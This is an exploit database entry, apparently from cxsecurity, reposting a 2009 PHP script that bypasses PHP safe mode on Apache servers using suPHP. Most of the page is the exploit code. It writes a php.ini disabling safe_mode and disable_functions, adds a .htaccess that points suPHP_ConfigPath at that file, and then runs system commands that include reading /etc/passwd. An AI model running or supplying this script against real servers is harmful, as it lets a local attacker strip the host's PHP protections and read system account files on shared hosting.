apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit

2009.01.01
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<? /* apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit Author : Mr.SaFa7 Home : v4-team.com note : this exploit for education :) */ echo "[+] Start...\n"; $bypfile=fopen('php.ini','w+'); $stuffile=fopen('.htaccess','w+'); if($bypfile and $stuffile!= NULL){ echo "[+] evil files created succes ! \n"; } else{ echo "[-] access denial ! \n"; } $byprullz1="safe_mode = OFF "; $byprullz2="disable_functions = NONE"; $dj=fwrite($bypfile,$byprullz1); $dj1=fwrite($bypfile,$byprullz2); fclose($bypfile); if($dj and $dj1!= NULL){ echo "[+] php.ini writed \n"; } else{ echo "[-] 404 php.ini not found !\n"; } $breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path $sf7=fwrite($stuffile,$breakrullz); fclose($stuffile); if($sf7!= NULL){ echo "[+] evil .htaccess writed\n"; echo "[+] exploited by success!\n\n\n"; echo "\t\t\t[+] discouvred by Mr.SaFa7\n"; echo "\t\t\t[+] home : v4-team.com\n"; echo "\t\t\t[+] Greetz : djekmani4ever ghost hacker Str0ke ShAfEKo4EvEr Mr.Mn7oS\n"; } else{ echo "[-] evil .htaccess Not found!\n"; } system("pwd;ls -lia;uname -a;cat /etc/passwd"); #EOF ?>

References:

http://seclists.org/bugtraq/2008/Dec/0270.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top